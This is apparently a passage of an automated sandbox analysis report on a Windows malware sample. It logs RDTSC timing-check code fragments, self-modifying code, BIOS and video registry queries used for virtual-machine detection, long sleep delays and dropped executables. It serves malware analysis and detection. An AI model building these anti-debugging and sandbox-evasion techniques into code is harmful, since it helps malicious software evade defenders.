Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53F04D6 second address: 53F04EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D34597Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53F04EF second address: 53F04F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53F04F3 second address: 53F04F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53F04F9 second address: 53F04FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53F04FF second address: 53F0503 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53F0503 second address: 53F0524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c call 00007F0D5D4BD024h 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53C0247 second address: 53C0262 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D345987h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53C0262 second address: 53C02D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D4BD029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F0D5D4BD01Eh 0x00000010 mov eax, dword ptr [ebp+08h] 0x00000013 jmp 00007F0D5D4BD020h 0x00000018 and dword ptr [eax], 00000000h 0x0000001b jmp 00007F0D5D4BD020h 0x00000020 and dword ptr [eax+04h], 00000000h 0x00000024 jmp 00007F0D5D4BD020h 0x00000029 pop ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F0D5D4BD01Ah 0x00000033 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53C02D8 second address: 53C02DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53C02DC second address: 53C02E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53A03EC second address: 53A03F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53A03F2 second address: 53A03F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53A03F6 second address: 53A044E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov edi, ecx 0x0000000c mov ch, E4h 0x0000000e popad 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov esi, edx 0x00000013 pushfd 0x00000014 jmp 00007F0D5D345985h 0x00000019 and cx, EA56h 0x0000001e jmp 00007F0D5D345981h 0x00000023 popfd 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 jmp 00007F0D5D34597Eh 0x0000002c pop ebp 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53A044E second address: 53A046B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D4BD029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53B0DAA second address: 53B0DAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53B0DAE second address: 53B0DB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53B0DB2 second address: 53B0DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53B0DB8 second address: 53B0DD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 71E37DA4h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F0D5D4BD01Ah 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53B0DD4 second address: 53B0DD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53C00CB second address: 53C00CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53C00CF second address: 53C00DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D34597Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53C00DF second address: 53C00E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53C00E5 second address: 53C013E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D34597Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F0D5D34597Ch 0x00000013 and ax, BA58h 0x00000018 jmp 00007F0D5D34597Bh 0x0000001d popfd 0x0000001e mov si, 630Fh 0x00000022 popad 0x00000023 push eax 0x00000024 pushad 0x00000025 mov esi, edx 0x00000027 mov ebx, 30D0F9D2h 0x0000002c popad 0x0000002d xchg eax, ebp 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F0D5D345984h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53E06C5 second address: 53E073A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0D5D4BD027h 0x00000009 and si, 943Eh 0x0000000e jmp 00007F0D5D4BD029h 0x00000013 popfd 0x00000014 mov edx, ecx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a jmp 00007F0D5D4BD01Dh 0x0000001f xchg eax, ebp 0x00000020 jmp 00007F0D5D4BD01Eh 0x00000025 mov ebp, esp 0x00000027 jmp 00007F0D5D4BD020h 0x0000002c xchg eax, ecx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53E073A second address: 53E073E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53E073E second address: 53E0744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53E0744 second address: 53E0765 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D345984h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov edi, eax 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53E0765 second address: 53E07D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0D5D4BD025h 0x00000009 xor ecx, 01421296h 0x0000000f jmp 00007F0D5D4BD021h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F0D5D4BD020h 0x0000001b xor si, 32B8h 0x00000020 jmp 00007F0D5D4BD01Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 xchg eax, ecx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F0D5D4BD025h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53E07D3 second address: 53E07D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53E07D9 second address: 53E07DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53E08F8 second address: 53E08FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53E08FC second address: 53E0902 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53E0902 second address: 53E0908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53E0908 second address: 53E0978 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D4BD01Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b leave 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F0D5D4BD01Ah 0x00000013 jmp 00007F0D5D4BD025h 0x00000018 popfd 0x00000019 popad 0x0000001a retn 0004h 0x0000001d nop 0x0000001e mov esi, eax 0x00000020 lea eax, dword ptr [ebp-08h] 0x00000023 xor esi, dword ptr [00B32014h] 0x00000029 push eax 0x0000002a push eax 0x0000002b push eax 0x0000002c lea eax, dword ptr [ebp-10h] 0x0000002f push eax 0x00000030 call 00007F0D61DAD987h 0x00000035 push FFFFFFFEh 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007F0D5D4BD023h 0x00000040 add al, 0000003Eh 0x00000043 jmp 00007F0D5D4BD029h 0x00000048 popfd 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53E0978 second address: 53E09D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F0D5D345989h 0x0000000b sbb ecx, 0D3BB726h 0x00000011 jmp 00007F0D5D345981h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop eax 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushfd 0x0000001f jmp 00007F0D5D34597Ah 0x00000024 sbb esi, 2007C8C8h 0x0000002a jmp 00007F0D5D34597Bh 0x0000002f popfd 0x00000030 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53E09D3 second address: 53E0A17 instructions: 0x00000000 rdtsc 0x00000002 mov ah, 4Eh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F0D5D4BD025h 0x0000000c sub cx, F9E6h 0x00000011 jmp 00007F0D5D4BD021h 0x00000016 popfd 0x00000017 popad 0x00000018 ret 0x00000019 nop 0x0000001a push eax 0x0000001b call 00007F0D61DADA47h 0x00000020 mov edi, edi 0x00000022 pushad 0x00000023 mov al, F2h 0x00000025 mov dh, C3h 0x00000027 popad 0x00000028 xchg eax, ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53E0A17 second address: 53E0A34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D345989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53E0A34 second address: 53E0A3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53E0A3A second address: 53E0A68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D345983h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov ecx, edx 0x0000000f mov edi, 457FC606h 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 movzx ecx, di 0x0000001c movsx edi, si 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53E0A68 second address: 53E0A84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 mov bl, 03h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0D5D4BD01Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53E0A84 second address: 53E0A94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D5D34597Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53E0A94 second address: 53E0A98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 5390008 second address: 539000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 539000C second address: 5390012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 5390012 second address: 5390018 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 5390018 second address: 539001C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 539001C second address: 5390043 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D34597Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007F0D5D34597Dh 0x00000014 pop eax 0x00000015 mov esi, edx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 5390043 second address: 5390060 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D5D4BD029h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 5390060 second address: 53900C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F0D5D34597Ah 0x00000010 jmp 00007F0D5D345985h 0x00000015 popfd 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 movsx ebx, ax 0x0000001c push ecx 0x0000001d mov dh, 5Eh 0x0000001f pop ecx 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 push esi 0x00000027 pop ebx 0x00000028 pushfd 0x00000029 jmp 00007F0D5D345980h 0x0000002e adc eax, 72C16E08h 0x00000034 jmp 00007F0D5D34597Bh 0x00000039 popfd 0x0000003a popad 0x0000003b rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Special instruction interceptor: First address: B3E9AB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Special instruction interceptor: First address: D1474D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Special instruction interceptor: First address: D71D6A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Special instruction interceptor: First address: D5E9AB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Special instruction interceptor: First address: F3474D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Special instruction interceptor: First address: F91D6A instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Memory allocated: 25B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Memory allocated: 2790000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Memory allocated: 4790000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2850000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2AC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 28C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2F40000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 30A0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 50A0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\hsRju5CPK2.exe

Code function: 0_2_054102EF rdtsc

0_2_054102EF

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Thread delayed: delay time: 180000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 589066
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 588941
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 588816
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 588699
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 588587
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 588478

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window / User API: threadDelayed 2375	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window / User API: threadDelayed 2062	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window / User API: threadDelayed 2839	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Window / User API: threadDelayed 5084	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Window / User API: threadDelayed 4545	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Window / User API: threadDelayed 9631
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 1085
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4967
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1149
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8755
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 567
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3552
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8932
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 691

Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000014001\1.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\6.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\1[1].exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_5-20324

Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe

API coverage: 3.2 %

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 1084	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 1084	Thread sleep time: -62031s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 736	Thread sleep count: 44 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 736	Thread sleep time: -88044s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 5784	Thread sleep count: 40 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 5784	Thread sleep time: -80040s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 6456	Thread sleep count: 261 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 6456	Thread sleep time: -7830000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 5300	Thread sleep count: 49 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 5300	Thread sleep time: -98049s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 5340	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 4052	Thread sleep count: 2375 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 4052	Thread sleep time: -4752375s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 3876	Thread sleep count: 2062 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 3876	Thread sleep time: -4126062s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 1776	Thread sleep count: 2839 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 1776	Thread sleep time: -5680839s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 1776	Thread sleep time: -30015s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 4052	Thread sleep time: -38019s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe TID: 6096	Thread sleep time: -35048813740048126s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1100	Thread sleep count: 199 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1100	Thread sleep count: 301 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3748	Thread sleep time: -35000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe TID: 4432	Thread sleep count: 9631 > 30
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe TID: 4432	Thread sleep time: -288930000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe TID: 4512	Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4708	Thread sleep count: 4967 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4280	Thread sleep count: 1149 > 30
